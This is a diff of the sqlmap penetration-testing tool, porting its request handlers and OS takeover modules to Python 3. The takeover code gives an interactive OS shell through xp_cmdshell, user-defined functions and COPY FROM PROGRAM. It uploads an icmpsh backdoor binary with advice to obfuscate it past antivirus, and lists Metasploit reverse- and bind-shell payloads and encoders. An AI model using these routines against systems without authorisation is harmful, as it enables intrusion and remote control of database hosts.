- range_handler = range.HTTPRangeHandler() - opener = urllib2.build_opener(range_handler) - - # install it - urllib2.install_opener(opener) - - # create Request and set Range header - req = urllib2.Request('http://www.python.org/') - req.header['Range'] = 'bytes=30-50' - f = urllib2.urlopen(req) """ def http_error_206(self, req, fp, code, msg, hdrs): # 206 Partial Content Response - r = urllib.addinfourl(fp, hdrs, req.get_full_url()) + r = _urllib.response.addinfourl(fp, hdrs, req.get_full_url()) r.code = code r.msg = msg return r def http_error_416(self, req, fp, code, msg, hdrs): # HTTP's Range Not Satisfiable error - errMsg = "Invalid range" + errMsg = "there was a problem while connecting " + errMsg += "target ('416 - Range Not Satisfiable')" raise SqlmapConnectionException(errMsg) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index c8ff422e3c8..a51b6dd809b 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -1,131 +1,206 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import urllib2 -import urlparse +import io +import re +import time +import types -from lib.core.data import kb -from lib.core.data import logger from lib.core.common import getHostHeader -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import logHTTPTraffic from lib.core.common import readInput +from lib.core.convert import getBytes +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTPHEADER +from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import REDIRECTION from lib.core.exception import SqlmapConnectionException -from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE +from lib.core.settings import DEFAULT_COOKIE_DELIMITER +from lib.core.settings import MAX_CONNECTION_READ_SIZE from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.threads import getCurrentThreadData from lib.request.basic import decodePage +from lib.request.basic import parseResponse +from thirdparty import six +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib -class SmartRedirectHandler(urllib2.HTTPRedirectHandler): +class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler): def _get_header_redirect(self, headers): retVal = None if headers: - if "location" in headers: - retVal = headers.getheaders("location")[0].split("?")[0] - elif "uri" in headers: - retVal = headers.getheaders("uri")[0].split("?")[0] + if HTTP_HEADER.LOCATION in headers: + retVal = headers[HTTP_HEADER.LOCATION] + elif HTTP_HEADER.URI in headers: + retVal = headers[HTTP_HEADER.URI] return retVal def _ask_redirect_choice(self, redcode, redurl, method): with kb.locks.redirect: - if kb.redirectChoice is None: - msg = "sqlmap got a %d redirect to " % redcode + if kb.choices.redirect is None: + msg = "got a %d redirect to " % redcode msg += "'%s'. Do you want to follow? [Y/n] " % redurl - choice = readInput(msg, default="Y") - kb.redirectChoice = choice.upper() + kb.choices.redirect = REDIRECTION.YES if readInput(msg, default='Y', boolean=True) else REDIRECTION.NO - if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: + if kb.choices.redirect == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: msg = "redirect is a result of a " msg += "POST request. Do you want to " msg += "resend original POST data to a new " msg += "location? [%s] " % ("Y/n" if not kb.originalPage else "y/N") - choice = readInput(msg, default=("Y" if not kb.originalPage else "N")) - kb.resendPostOnRedirect = choice.upper() == 'Y' + kb.resendPostOnRedirect = readInput(msg, default=('Y' if not kb.originalPage else 'N'), boolean=True) - if kb.resendPostOnRedirect: - self.redirect_request = self._redirect_request + if kb.resendPostOnRedirect: + self.redirect_request = self._redirect_request def _redirect_request(self, req, fp, code, msg, headers, newurl): - newurl = newurl.replace(' ', '%20') - return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host()) + retVal = _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host() if hasattr(req, "get_origin_req_host") else req.origin_req_host) + + if hasattr(req, "redirect_dict"): + retVal.redirect_dict = req.redirect_dict + + return retVal def http_error_302(self, req, fp, code, msg, headers): + start = time.time() content = None - redurl = self._get_header_redirect(headers) + forceRedirect = False + redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None try: - content = fp.read(MAX_CONNECTION_TOTAL_SIZE) - except Exception, msg: - dbgMsg = "there was a problem while retrieving " - dbgMsg += "redirect response content (%s)" % msg - logger.debug(dbgMsg) - finally: - if content: - try: # try to write it back to the read buffer so we could reuse it in further steps - fp.fp._rbuf.truncate(0) - fp.fp._rbuf.write(content) - except: - pass - - content = decodePage(content, headers.get(HTTPHEADER.CONTENT_ENCODING), headers.get(HTTPHEADER.CONTENT_TYPE)) + content = fp.fp.read(MAX_CONNECTION_TOTAL_SIZE) + fp.fp = io.BytesIO(content) + except _http_client.IncompleteRead as ex: + content = ex.partial + fp.fp = io.BytesIO(content) + except: + content = b"" + + content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE)) threadData = getCurrentThreadData() threadData.lastRedirectMsg = (threadData.lastRequestUID, content) redirectMsg = "HTTP redirect " - redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg)) + redirectMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, getUnicode(msg)) if headers: - logHeaders = "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in headers.items()) + logHeaders = "\r\n".join("%s: %s" % (getUnicode(key.capitalize() if hasattr(key, "capitalize") else key), getUnicode(value)) for (key, value) in headers.items()) else: logHeaders = "" redirectMsg += logHeaders if content: - redirectMsg += "\n\n%s" % content[:MAX_CONNECTION_CHUNK_SIZE] + redirectMsg += "\r\n\r\n%s" % getUnicode(content[:MAX_CONNECTION_READ_SIZE]) - logHTTPTraffic(threadData.lastRequestMsg, redirectMsg) + logHTTPTraffic(threadData.lastRequestMsg, redirectMsg, start, time.time()) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg) if redurl: - if not urlparse.urlsplit(redurl).netloc: - redurl = urlparse.urljoin(req.get_full_url(), redurl) - - self._infinite_loop_check(req) - self._ask_redirect_choice(code, redurl, req.get_method()) - - if redurl and kb.redirectChoice == REDIRECTION.YES: - req.headers[HTTPHEADER.HOST] = getHostHeader(redurl) - result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) + try: + if not _urllib.parse.urlsplit(redurl).netloc: + redurl = _urllib.parse.urljoin(req.get_full_url(), redurl) + + self._infinite_loop_check(req) + if conf.scope: + if not re.search(conf.scope, redurl, re.I): + redurl = None + else: + forceRedirect = True + else: + self._ask_redirect_choice(code, redurl, req.get_method()) + except ValueError: + redurl = None + result = fp + + if redurl and (kb.choices.redirect == REDIRECTION.YES or forceRedirect): + parseResponse(content, headers) + + req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) + if headers and HTTP_HEADER.SET_COOKIE in headers: + cookies = dict() + delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER + last = None + + for part in getUnicode(req.headers.get(HTTP_HEADER.COOKIE, "")).split(delimiter) + ([headers[HTTP_HEADER.SET_COOKIE]] if HTTP_HEADER.SET_COOKIE in headers else []): + if '=' in part: + part = part.strip() + key, value = part.split('=', 1) + cookies[key] = value + last = key + elif last: + cookies[last] += "%s%s" % (delimiter, part) + + req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies) + + try: + result = _urllib.request.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) + except _urllib.error.HTTPError as ex: + result = ex + + # Dirty hack for https://github.com/sqlmapproject/sqlmap/issues/4046 + try: + hasattr(result, "read") + except KeyError: + class _(object): + pass + result = _() + + # Dirty hack for http://bugs.python.org/issue15701 + try: + result.info() + except AttributeError: + def _(self): + return getattr(self, "hdrs", {}) + + result.info = types.MethodType(_, result) + + if not hasattr(result, "read"): + def _(self, length=None): + try: + retVal = getSafeExString(ex) # Note: pyflakes mistakenly marks 'ex' as undefined (NOTE: tested in both Python2 and Python3) + except: + retVal = "" + return getBytes(retVal) + + result.read = types.MethodType(_, result) + + if not getattr(result, "url", None): + result.url = redurl + + if not getattr(result, "code", None): + result.code = 999 + except: + redurl = None + result = fp + fp.read = io.BytesIO(b"").read else: result = fp - if HTTPHEADER.SET_COOKIE in headers: - kb.redirectSetCookie = headers.get(HTTPHEADER.SET_COOKIE).split("; path")[0] + threadData.lastRedirectURL = (threadData.lastRequestUID, redurl) result.redcode = code - result.redurl = redurl - + result.redurl = getUnicode(redurl) if six.PY3 else redurl return result - http_error_301 = http_error_303 = http_error_307 = http_error_302 + http_error_301 = http_error_303 = http_error_307 = http_error_308 = http_error_302 def _infinite_loop_check(self, req): if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS): errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) - errMsg += "please check all provided parameters and/or provide missing ones." + errMsg += "Please check all provided parameters and/or provide missing ones" raise SqlmapConnectionException(errMsg) diff --git a/lib/request/templates.py b/lib/request/templates.py index f073c1dda88..42ebe074e20 100644 --- a/lib/request/templates.py +++ b/lib/request/templates.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import kb @@ -13,10 +13,9 @@ def getPageTemplate(payload, place): if payload and place: if (payload, place) not in kb.pageTemplates: - page, _ = Request.queryPage(payload, place, content=True) + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) retVal = kb.pageTemplates[(payload, place)] return retVal - diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/takeover/__init__.py +++ b/lib/takeover/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 51fab985413..cb3e8a58bcb 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -1,33 +1,40 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from extra.safe2bin.safe2bin import safechardecode -from lib.core.common import dataToStdout +from __future__ import print_function + +import sys + from lib.core.common import Backend +from lib.core.common import dataToStdout from lib.core.common import getSQLSnippet -from lib.core.common import isTechniqueAvailable +from lib.core.common import isStackingAvailable from lib.core.common import readInput +from lib.core.convert import getUnicode from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger +from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import DBMS -from lib.core.enums import PAYLOAD +from lib.core.enums import OS from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.shell import autoCompletion from lib.request import inject from lib.takeover.udf import UDF from lib.takeover.web import Web -from lib.takeover.xp_cmdshell import Xp_cmdshell - +from lib.takeover.xp_cmdshell import XP_cmdshell +from lib.utils.safe2bin import safechardecode +from thirdparty.six.moves import input as _input -class Abstraction(Web, UDF, Xp_cmdshell): +class Abstraction(Web, UDF, XP_cmdshell): """ This class defines an abstraction layer for OS takeover functionalities - to UDF / Xp_cmdshell objects + to UDF / XP_cmdshell objects """ def __init__(self): @@ -36,10 +43,13 @@ def __init__(self): UDF.__init__(self) Web.__init__(self) - Xp_cmdshell.__init__(self) + XP_cmdshell.__init__(self) def execCmd(self, cmd, silent=False): - if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): + if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + self.copyExecCmd(cmd) + + elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): self.webBackdoorRunCmd(cmd) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): @@ -55,7 +65,10 @@ def execCmd(self, cmd, silent=False): def evalCmd(self, cmd, first=None, last=None): retVal = None - if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): + if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + retVal = self.copyExecCmd(cmd) + + elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): retVal = self.webBackdoorRunCmd(cmd) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): @@ -71,17 +84,17 @@ def evalCmd(self, cmd, first=None, last=None): return safechardecode(retVal) def runCmd(self, cmd): - getOutput = None + choice = None if not self.alwaysRetrieveCmdOutput: message = "do you want to retrieve the command standard " message += "output? [Y/n/a] " - getOutput = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if getOutput in ("a", "A"): + if choice == 'A': self.alwaysRetrieveCmdOutput = True - if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput: + if choice == 'Y' or self.alwaysRetrieveCmdOutput: output = self.evalCmd(cmd) if output: @@ -92,20 +105,25 @@ def runCmd(self, cmd): self.execCmd(cmd) def shell(self): - if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): + if self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): infoMsg = "calling OS shell. To quit type " infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) else: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - infoMsg = "going to use injected sys_eval and sys_exec " - infoMsg += "user-defined functions for operating system " + if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + infoMsg = "going to use 'COPY ... FROM PROGRAM ...' " + infoMsg += "command execution" + logger.info(infoMsg) + + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + infoMsg = "going to use injected user-defined functions " + infoMsg += "'sys_eval' and 'sys_exec' for operating system " infoMsg += "command execution" logger.info(infoMsg) elif Backend.isDbms(DBMS.MSSQL): - infoMsg = "going to use xp_cmdshell extended procedure for " + infoMsg = "going to use extended procedure 'xp_cmdshell' for " infoMsg += "operating system command execution" logger.info(infoMsg) @@ -117,19 +135,22 @@ def shell(self): infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) - autoCompletion(osShell=True) + autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX) while True: command = None try: - command = raw_input("os-shell> ") + command = _input("os-shell> ") + command = getUnicode(command, encoding=sys.stdin.encoding) + except UnicodeDecodeError: + pass except KeyboardInterrupt: - print + print() errMsg = "user aborted" logger.error(errMsg) except EOFError: - print + print() errMsg = "exit" logger.error(errMsg) break @@ -146,8 +167,8 @@ def _initRunAs(self): if not conf.dbmsCred: return - if not conf.direct and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - errMsg = "stacked queries is not supported hence sqlmap cannot " + if not conf.direct and not isStackingAvailable(): + errMsg = "stacked queries are not supported hence sqlmap cannot " errMsg += "execute statements as another user. The execution " errMsg += "will continue and the DBMS credentials provided " errMsg += "will simply be ignored" @@ -159,23 +180,22 @@ def _initRunAs(self): msg = "on Microsoft SQL Server 2005 and 2008, OPENROWSET function " msg += "is disabled by default. This function is needed to execute " msg += "statements as another DBMS user since you provided the " - msg += "--dbms-creds switch. If you are DBA, you can enable it. " + msg += "option '--dbms-creds'. If you are DBA, you can enable it. " msg += "Do you want to enable it? [Y/n] " - choice = readInput(msg, default="Y") - if not choice or choice in ("y", "Y"): + if readInput(msg, default='Y', boolean=True): expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1") inject.goStacked(expression) # TODO: add support for PostgreSQL - #elif Backend.isDbms(DBMS.PGSQL): - # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") - # inject.goStacked(expression) + # elif Backend.isDbms(DBMS.PGSQL): + # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") + # inject.goStacked(expression) - def initEnv(self, mandatory=True, detailed=False, web=False): + def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): self._initRunAs() - if self.envInitialized: + if self.envInitialized and not forceInit: return if web: @@ -185,7 +205,7 @@ def initEnv(self, mandatory=True, detailed=False, web=False): if mandatory and not self.isDba(): warnMsg = "functionality requested probably does not work because " - warnMsg += "the curent session user is not a database administrator" + warnMsg += "the current session user is not a database administrator" if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): warnMsg += ". You can try to use option '--dbms-cred' " @@ -193,9 +213,11 @@ def initEnv(self, mandatory=True, detailed=False, web=False): warnMsg += "were able to extract and crack a DBA " warnMsg += "password by any mean" - logger.warn(warnMsg) + logger.warning(warnMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + success = True + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): success = self.udfInjectSys() if success is not True: diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index 53fb73892d0..044394fc04a 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -1,11 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os +import re +import socket import time from extra.icmpsh.icmpsh_m import main as icmpshmaster @@ -18,9 +20,9 @@ from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths +from lib.core.exception import SqlmapDataException - -class ICMPsh: +class ICMPsh(object): """ This class defines methods to call icmpsh for plugins. """ @@ -29,22 +31,54 @@ def _initVars(self): self.lhostStr = None self.rhostStr = None self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() + self.remoteIP = getRemoteIP() or conf.hostname self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_")) def _selectRhost(self): - message = "what is the back-end DBMS address? [%s] " % self.remoteIP - address = readInput(message, default=self.remoteIP) + address = None + message = "what is the back-end DBMS address? " + + if self.remoteIP: + message += "[Enter for '%s' (detected)] " % self.remoteIP + + while not address: + address = readInput(message, default=self.remoteIP) + + if conf.batch and not address: + raise SqlmapDataException("remote host address is missing") return address def _selectLhost(self): - message = "what is the local address? [%s] " % self.localIP - address = readInput(message, default=self.localIP) + address = None + message = "what is the local address? " + + if self.localIP: + message += "[Enter for '%s' (detected)] " % self.localIP + + valid = None + while not valid: + valid = True + address = readInput(message, default=self.localIP or "") + + try: + socket.inet_aton(address) + except socket.error: + valid = False + finally: + valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None + + if conf.batch and not address: + raise SqlmapDataException("local host address is missing") + elif address and not valid: + warnMsg = "invalid local host address" + logger.warning(warnMsg) return address def _prepareIngredients(self, encode=True): + self.localIP = getattr(self, "localIP", None) + self.remoteIP = getattr(self, "remoteIP", None) self.lhostStr = ICMPsh._selectLhost(self) self.rhostStr = ICMPsh._selectRhost(self) @@ -67,19 +101,30 @@ def uploadIcmpshSlave(self, web=False): self._randStr = randomStr(lowercase=True) self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr - if web: - self._icmpslaveRemote = "%s/%s" % (self.webDirectory, self._icmpslaveRemoteBase) - else: - self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase) - + self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase) self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote)) logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote) if web: - self.webUpload(self._icmpslaveRemote, self.webDirectory, filepath=self._icmpslave) + written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave) + else: + written = self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary", forceCheck=True) + + if written is not True: + errMsg = "there has been a problem uploading icmpsh, it " + errMsg += "looks like the binary file has not been written " + errMsg += "on the database underlying file system or an AV has " + errMsg += "flagged it as malicious and removed it. In such a case " + errMsg += "it is recommended to recompile icmpsh with slight " + errMsg += "modification to the source code or pack it with an " + errMsg += "obfuscator software" + logger.error(errMsg) + + return False else: - self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary") + logger.info("icmpsh successfully uploaded") + return True def icmpPwn(self): ICMPsh._prepareIngredients(self) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 38fdcc8a7a1..d29dfae9af6 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -1,49 +1,60 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + +import errno import os import re +import select import sys +import tempfile import time from subprocess import PIPE +from extra.cloak.cloak import cloak +from extra.cloak.cloak import decloak from lib.core.common import dataToStdout from lib.core.common import Backend from lib.core.common import getLocalIP from lib.core.common import getRemoteIP -from lib.core.common import getUnicode +from lib.core.common import isDigit from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import pollProcess from lib.core.common import randomRange from lib.core.common import randomStr from lib.core.common import readInput +from lib.core.convert import getBytes +from lib.core.convert import getText from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import DBMS from lib.core.enums import OS from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapGenericException from lib.core.settings import IS_WIN -from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import METASPLOIT_SESSION_TIMEOUT +from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingWriteToFD from lib.core.subprocessng import Popen as execute from lib.core.subprocessng import send_all from lib.core.subprocessng import recv_some +from thirdparty import six if IS_WIN: import msvcrt -else: - from select import select -class Metasploit: +class Metasploit(object): """ This class defines methods to call Metasploit for plugins. """ @@ -57,72 +68,68 @@ def _initVars(self): self.encoderStr = None self.payloadConnStr = None self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() - self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) - self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) - self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) - - if IS_WIN: - _ = normalizePath(os.path.join(conf.msfPath, "..", "scripts", "setenv.bat")) - self._msfCli = "%s & ruby %s" % (_, self._msfCli) - self._msfEncode = "ruby %s" % self._msfEncode - self._msfPayload = "%s & ruby %s" % (_, self._msfPayload) + self.remoteIP = getRemoteIP() or conf.hostname + self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli%s" % (".bat" if IS_WIN else ""))) + self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole%s" % (".bat" if IS_WIN else ""))) + self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode%s" % (".bat" if IS_WIN else ""))) + self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload%s" % (".bat" if IS_WIN else ""))) + self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom%s" % (".bat" if IS_WIN else ""))) self._msfPayloadsList = { - "windows": { - 1: ("Meterpreter (default)", "windows/meterpreter"), - 2: ("Shell", "windows/shell"), - 3: ("VNC", "windows/vncinject"), - }, - "linux": { - 1: ("Shell (default)", "linux/x86/shell"), - 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), - } - } + "windows": { + 1: ("Meterpreter (default)", "windows/meterpreter"), + 2: ("Shell", "windows/shell"), + 3: ("VNC", "windows/vncinject"), + }, + "linux": { + 1: ("Shell (default)", "linux/x86/shell"), + 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), + } + } self._msfConnectionsList = { - "windows": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), - 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), - 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), - 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - }, - "linux": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - } - } + "windows": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), + 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), + 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), + 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + }, + "linux": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + } + } self._msfEncodersList = { - "windows": { - 1: ("No Encoder", "generic/none"), - 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), - 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), - 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), - 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), - 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), - 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), - 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), - 9: ("Non-Alpha Encoder", "x86/nonalpha"), - 10: ("Non-Upper Encoder", "x86/nonupper"), - 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), - 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), - 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), - } - } + "windows": { + 1: ("No Encoder", "generic/none"), + 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), + 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), + 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), + 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), + 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), + 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), + 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), + 9: ("Non-Alpha Encoder", "x86/nonalpha"), + 10: ("Non-Upper Encoder", "x86/nonupper"), + 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), + 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), + 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), + } + } self._msfSMBPortsList = { - "windows": { - 1: ("139/TCP", "139"), - 2: ("445/TCP (default)", "445"), - } - } + "windows": { + 1: ("139/TCP", "139"), + 2: ("445/TCP (default)", "445"), + } + } self._portData = { - "bind": "remote port number", - "reverse": "local port number", - } + "bind": "remote port number", + "reverse": "local port number", + } def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): if Backend.isOs(OS.WINDOWS): @@ -148,19 +155,8 @@ def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): choice = readInput(message, default="%d" % default) - if not choice: - if lst: - choice = getUnicode(default, UNICODE_ENCODING) - else: - return default - - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - return self._skeletonSelection(msg, lst, maxValue, default) - - elif int(choice) > maxValue or int(choice) < 1: - logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue) - return self._skeletonSelection(msg, lst, maxValue, default) + if not choice or not isDigit(choice) or int(choice) > maxValue or int(choice) < 1: + choice = default choice = int(choice) @@ -177,7 +173,7 @@ def _selectEncoder(self, encode=True): # choose which encoder to use. When called from --os-pwn the encoder # is always x86/alpha_mixed - used for sys_bineval() and # shellcodeexec - if isinstance(encode, basestring): + if isinstance(encode, six.string_types): return encode elif encode: @@ -200,7 +196,7 @@ def _selectPayload(self): if Backend.isDbms(DBMS.MYSQL): 